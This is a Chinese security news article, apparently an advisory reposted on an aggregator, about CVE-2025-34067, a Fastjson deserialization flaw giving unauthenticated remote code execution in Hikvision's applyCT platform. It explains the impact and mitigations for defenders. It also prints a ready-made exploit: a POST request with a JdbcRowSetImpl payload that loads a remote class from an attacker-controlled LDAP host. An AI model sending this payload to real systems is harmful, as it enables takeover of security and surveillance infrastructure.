安全客 07月07日 15:55
海康威视 applyCT 爆 CVSS 10.0 级严重漏洞(CVE-2025-34067):Fastjson 反序列化致未授权远程命令执行
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

近日,海康威视安防管理平台applyCT(原HikCentral)被曝出严重漏洞,编号CVE-2025-34067,CVSS v4评分高达10.0。该漏洞允许攻击者通过未授权远程命令执行(RCE)控制系统,对商业、政府、工业等关键场景的安防基础设施构成巨大威胁。漏洞源于applyCT组件依赖的Fastjson库的反序列化漏洞,攻击者可通过构造恶意JSON载荷,触发远程代码执行。由于该平台广泛应用于关键物理安全系统,一旦被利用,可能导致监控系统劫持、视频流篡改等严重后果。建议立即排查并升级Fastjson组件,加强安全防护。

🚨 漏洞详情:海康威视applyCT平台存在CVE-2025-34067漏洞,CVSS v4评分为满分10.0,属于高危级别,可被远程利用。

💻 攻击原理:攻击者构造恶意JSON载荷,利用Fastjson库的漏洞,通过LDAP服务器加载远程Java类,从而在目标系统上执行任意代码。

⚠️ 潜在风险:该漏洞可被远程直接利用,可能导致监控系统被劫持、视频流篡改,甚至横向渗透进入企业内网,带来严重的物理安全威胁。

🛡️ 应急措施:建议立即排查系统是否暴露相关接口,更新Fastjson至安全版本或应用官方补丁,加强出站LDAP通信监控,并进行全面的安全审计,以降低风险。

近日披露的一项严重漏洞影响了 海康威视广泛部署的安防管理平台 applyCT(即原 HikCentral),该漏洞编号为 CVE-2025-34067,CVSS v4 评分为 满分 10.0,可被攻击者利用实现 未授权远程命令执行(RCE),威胁范围波及大量监控与安全基础设施。

applyCT 是一款集成化安防管理平台,广泛应用于商业、政府、工业等关键场景,用于集中管控和调度安防设备,具备强大的分析能力和可扩展架构,因此在高安全需求的环境中部署率极高。

然而,其 applyCT 组件依赖的 Fastjson 库存在反序列化漏洞,攻击者可通过该漏洞在目标服务器上执行任意代码。漏洞触发点位于系统接口 /bic/ssoService/v1/applyCT 对 JSON 数据的处理逻辑中。“由于使用了存在漏洞的 Fastjson 库版本,applyCT 组件中存在未授权远程命令执行漏洞。”——官方 CVE 描述指出。

攻击原理解析:Fastjson + LDAP 联动触发远程代码执行

 

Fastjson 是一个常用的 Java JSON 解析库,其“autoType”机制允许动态加载类。在未禁用该特性的情况下,攻击者可通过构造恶意 JSON 载荷,引导后端反序列化任意类,从而达到代码执行的目的。

在此次漏洞中,攻击者通过构造特殊的 POST 请求,向目标接口发送 JSON 数据包,利用 JdbcRowSetImpl 类从攻击者控制的 LDAP 服务器加载远程 Java 类,从而在目标系统中执行恶意指令。

POST /bic/ssoService/v1/applyCT 
Content-Type: application/json

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}

漏洞利用关键路径

  1. 构造携带恶意“datasource”字段的 JSON 载荷;

  2. 发送 POST 请求至 /bic/ssoService/v1/applyCT 接口;

  3. 服务端反序列化后,连接攻击者控制的 LDAP 服务器;

  4. 触发远程类加载,完成 无认证的远程代码执行(RCE)

高风险影响:不止是网络安全,更是物理安防威胁

 

该漏洞不需要认证过程,可被远程直接利用,尤其当受影响接口暴露在公网时,风险更为严重。鉴于海康平台常用于管理 关键物理安全系统,本次漏洞不仅构成 网络安全问题,更可能带来 实际安防控制风险

 一旦被成功利用,攻击者可能:

  • 劫持监控系统,实时操控摄像头画面;

  • 篡改或关闭安防视频流

  • 横向移动进入企业内部网络

  • 实施进一步的内网攻击与持久控制

应急响应建议:立即排查并升级 Fastjson 组件

 

针对本次高危漏洞,建议受影响组织立即采取以下安全加固措施:

  1. 排查系统是否暴露 /bic/ssoService/v1/applyCT 接口,如非必要应立即关闭外网访问;

  2. 更新 Fastjson 至官方安全版本,或应用海康官方提供的补丁修复方案;

  3. 加强出站 LDAP 通信监控,识别潜在的远程类加载行为;

  4. 对海康 applyCT 或 HikCentral 平台进行全面安全审计,识别潜在横向渗透风险。

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

海康威视 漏洞 Fastjson 远程命令执行 安防
相关文章